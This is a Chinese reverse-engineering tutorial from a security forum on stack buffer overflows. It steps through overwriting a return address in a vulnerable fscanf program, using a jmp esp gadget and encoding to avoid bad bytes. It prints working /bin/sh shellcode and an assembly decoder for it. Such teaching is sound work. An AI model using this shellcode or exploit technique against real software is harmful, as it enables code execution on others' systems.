查看原文
其他

栈溢出原理和利用

自然dashen 看雪学院 2021-03-07

本文为看雪论坛优秀文章

看雪论坛作者ID:自然dashen



案例代码


 

int main(void)
{
    char cPas[20]={20 *0};
    int iResult;
    FILE* pFile = NULL;
    pFile = fopen("pd.txt", "r");
 
    fscanf(pFile, "%s",cPas);
    iResult=strcmp(Password, cPas);
    if(iResult == 0)
    {
        printf("Welcom\r\n");
    }
    else
    {
        printf("fail\r\n");
    }
    fclose(pFile);
    return 0;
}



栈溢出原理


 

栈溢出是指向向栈中写入了超出限定长度的数据,溢出的数据会覆盖栈中其它数据,从而影响程序的运行。


+ fscanf()函数(有点像正则表达式):
 
功 能: 从一个流中执行格式化输入,fscanf遇到空格和换行时结束,注意空格时也结束。
 
用 法:int fscanf(FILE *stream, char *format,[argument...]);


案例代码中fscanf读取文件到cPas中,没有限定读多少,那么可以读大量的16进制到栈里。


如图:
把断点下到fscanf这个函数在这里,注释是我自己写的。可以发现buff是ecx的值,所有在堆栈那里跟到buff。然后选择锁定堆栈,为了让我们方便观看这一块堆栈:




F8单步走一步,然后发现读的值在栈里面了,可以发现下面有个返回地址,如果我们把读的数据返回地址给覆盖成我们的代码地址呢?


是不是就可以执行我们的代码了。返回地址是6*7=28字节后面的4自己改我们的返回地址。



由上图可以知道第25个字节是我们的返回地址,编写好记住栈的返回地址的地址是0018FF4c,我们往这个地址里面改成我们需要返回的地址内容,我改的是0018FF50,下面是我的nop代码。




F8执行fscanf,读入的数据把返回地址覆盖了,返回地址变成了0018FF50。




最后走到retn的地方,retn的操作是jmp esp 并且 pop esp所有单步F8的话会到0018FF50这个地方执行代码。




观察Eip和反汇编窗口,发现执行了我们的代码:




栈溢出漏洞的利用


 

>>>>

问题


1. 首先栈的位置不一定能确定,那么返回值的代码同样不能确定,我们的目的是要在返回函数地址的下一行执行我们的代码。


2. fscanf函数在读取到0XA,0XC,0X20...这样的Hex时会被中断。


>>>>

解决问题

第一个问题我们可以使用jmp esp这个解决,HEX为FF E4,在返回地址处填上jmp esp这句代码的地址,这个exe的代码里面搜索到FF E4,把返回地址改成这个即可。

搜索方法:ALT+M 然后Ctrl+B搜索:


使用插件搜索:


可以发现非常多的log,这里我们一般选择主模块(随机基址会出问题)的或者kerenl32.dll、ntdll.dll,窗口的程序加上user32.dll(Winows必定会加载的dll,加载顺序都一样,但是可能系统版本不一样,导致dll不一样),这里看情况办事了。



第二个问题我们可以对fscanf代码进程加密使其不产生这些Hex。

使用工具:



特征文件的后缀是.fea 。



需要异或的代码后缀是.code,利用漏执行shellcode。


利用漏洞执行shellcode


 
论坛随便看到的shellcode。


Explanation:
6a 0b push 0xb
58                     pop eax
99                     cdq
68 2f 73 68 00  push 0x68732f 
68 2f 62 69 6e push 0x6e69622f
89 e3 mov ebx,esp
31 c9 xor ecx,ecx
cd 80                int 0x80


然后就是发现这段shellcode里面有 cd 0b这样的阶段HEX,所以我自己写了改这段代码的shellcode。

.386
.model flat, stdcall ;32 bit memory model
option casemap :none ;case sensitive
 
.code
start:
call Next
Next:
pop ebx
sub ebx,offset Next
 
lea eax,[ebx+offset mydata]
 
;1Bh==>Bh
mov bl,[eax+1]
sub bl,10h
mov [eax+1],bl
;0CEh==>CDh
mov bl,[eax+18]
dec bl
mov [eax+18],bl
 
mydata db 6Ah,1Bh,58h,099h,68h,2Fh,73h,68h,00h,68h,2Fh,62h,69h,6Eh,89h,0E3h,31h,0C9h,0CEh,80h
 
ret
end start


编译链接exe,winhex打开复制shellcode代码:

 
复制到我们的输入中去:



OD执行下:





怎么防止栈溢出漏洞



1. 系统中开启DEP(数据保护执行):


2. 编译的时候VS中有选项:




- End -






看雪ID:自然dashen

https://bbs.pediy.com/user-710414.htm 

*本文由看雪论坛  自然dashen  原创,转载请注明来自看雪社区




推荐文章++++

应急服务辅助工具与系统溯源思路

利用auxv控制canary

未知黑客团队钓鱼样本分析

使用Binary Ninja去除ollvm流程平坦混淆

某盗链App逆向


好书推荐






公众号ID:ikanxue
官方微博:看雪安全
商务合作:wsc@kanxue.com



“阅读原文”一起来充电吧!

    您可能也对以下帖子感兴趣

    文章有问题?点此查看未经处理的缓存